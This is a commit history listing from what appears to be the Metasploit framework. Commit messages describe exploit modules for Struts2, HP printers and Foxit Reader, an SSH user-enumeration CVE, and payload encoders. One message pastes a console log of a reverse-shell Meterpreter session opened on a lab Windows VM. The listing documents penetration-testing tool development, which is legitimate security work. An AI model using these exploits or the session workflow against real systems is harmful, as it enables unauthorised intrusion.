Commit Graph

24602 Commits

Author SHA1 Message Date
alpiste f1e4079641 move add_thread code to lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb 2018-08-28 09:02:21 -05:00
alpiste 015abca8af MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste bb151bb727 MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste 2251c4a712 Add peinjector post module 2018-08-28 09:02:21 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
Brent Cook 53b369d702 avoid inserting a float into instruction generation randomly 2018-08-27 11:24:38 -05:00
Brent Cook 47ca6c6a14 Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Jacob Robles 79b3e4564a Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
Brent Cook cb07ba2b6c Land #10516, Add brace expansion encoder and update ${IFS} encoder 2018-08-25 22:23:07 -05:00
William Vu 6df235062b Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
Brent Cook 51c024982c Land #8914, refactor auxiliary/admin/http credential storage 2018-08-24 13:18:32 -05:00
Brent Cook 0141fc109d don't backtrace if there is not a response 2018-08-24 13:17:06 -05:00
Jacob Robles f6674a96d9 Update poc link 2018-08-24 10:52:01 -05:00
Jacob Robles 7f3824b067 Additional path for Linux target 2018-08-24 07:18:24 -05:00
William Vu 672dbb7acb Land #9364, HP PJL/SNMP CVE-2017-2741 exploit
Finally!
2018-08-23 22:47:09 -05:00
William Vu 318ff95dbd Remove trailing whitespace from netcat payloads
This has been bugging me for so long.
2018-08-23 21:33:58 -05:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
Wei Chen 2193dd662d Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00
Matthew Kienow ecc6c473d8 Add note about unauthenticated telnetd service 2018-08-23 15:50:41 -04:00
Jacob Robles 7ceae8df58 Remove '.exe' from share name 2018-08-23 14:38:46 -05:00
Matthew Kienow 56433c8ed2 Functional decomposition refactor and cleanup 2018-08-23 15:23:42 -04:00
Matthew Kienow 961769c346 Fix SNMP Null class comparison 2018-08-23 15:23:42 -04:00
Matthew Kienow 9c05f14a70 Modify SNMP null and error handling 2018-08-23 15:23:42 -04:00
Matthew Kienow 934bb38a44 Omit parentheses for no argument method calls 2018-08-23 15:23:41 -04:00
Matthew Kienow c5958c6e38 Restore original rport value 2018-08-23 15:23:41 -04:00
Matthew Kienow 70a0b9b1be Remove payload RequiredCmd and reformat info 2018-08-23 15:23:41 -04:00
Matthew Kienow dafa62dec4 Use string interpolation over concatenation 2018-08-23 15:23:40 -04:00
Matthew Kienow 7c03454a0b Remove unnecessary explicit msf/core require 2018-08-23 15:23:40 -04:00
Matthew Kienow b1a308f3ae Remove final debug output 2018-08-23 15:23:40 -04:00
Matthew Kienow e21ea4180f Clean up module and payload
Update module info, remove intermediate ARCH_ARMLE target, simply
options and add cleanup command so that the payload kills telnetd
2018-08-23 15:23:40 -04:00
Matthew Kienow 81f1555439 Rename module, exploits multiple printer models 2018-08-23 15:23:40 -04:00
Matthew Kienow df18e354e1 Add bind_busybox_telnetd payload, misc cleanup 2018-08-23 15:23:39 -04:00
Matthew Kienow c0c3e12c74 WIP - hp officejet pro exploit, enhance PJL lib 2018-08-23 14:53:54 -04:00
William Vu 578d2375d7 Add full disclosure for CVE-2018-15473 2018-08-22 14:49:13 -05:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Wei Chen 2780ae6ba9 Update false negatives 2018-08-21 08:50:26 -05:00
Jacob Robles fd6880d0d0 Add Foxit Reader UAF Module and Docs 2018-08-21 08:21:51 -05:00
William Vu 06582a00a0 Add module doc for ssh_enumusers
And update description in module.
2018-08-20 19:26:51 -05:00
Wei Chen ad0291e552 Update false negatives 2018-08-20 18:08:19 -05:00
Brent Cook 11fee8fa2c Land #10471, Import target DefaultOptions into the datastore 2018-08-20 17:30:27 -05:00
Brent Cook d1b8846f12 Land #10479, Add CVE-2018-15473 to ssh_enumusers 2018-08-20 17:14:58 -05:00
William Vu 819b8504e2 Add a little better randomization 2018-08-20 17:10:14 -05:00
William Vu b38a442bb0 Refactor once more with feeling
Also flesh out malformed-packet auth method. Let's not be lazy here. :-)
2018-08-20 16:25:32 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Brent Cook e8af2dd67c bool params are truthy, don't cast to a string 2018-08-20 15:53:49 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
Auxilus 7c3810bbff fix match error in ppc simple nop generator
before changes:
```
msf5 nop(ppc/simple) > generate 10
[-] Sled generation failed: undefined method `match' for true:TrueClass.
```

After changes
```
msf5 nop(ppc/simple) > generate 10
buf =
"\x7c\xf6\xc2\x15\x7c\xf6\xc2\x15"
```
2018-08-20 23:16:32 +05:30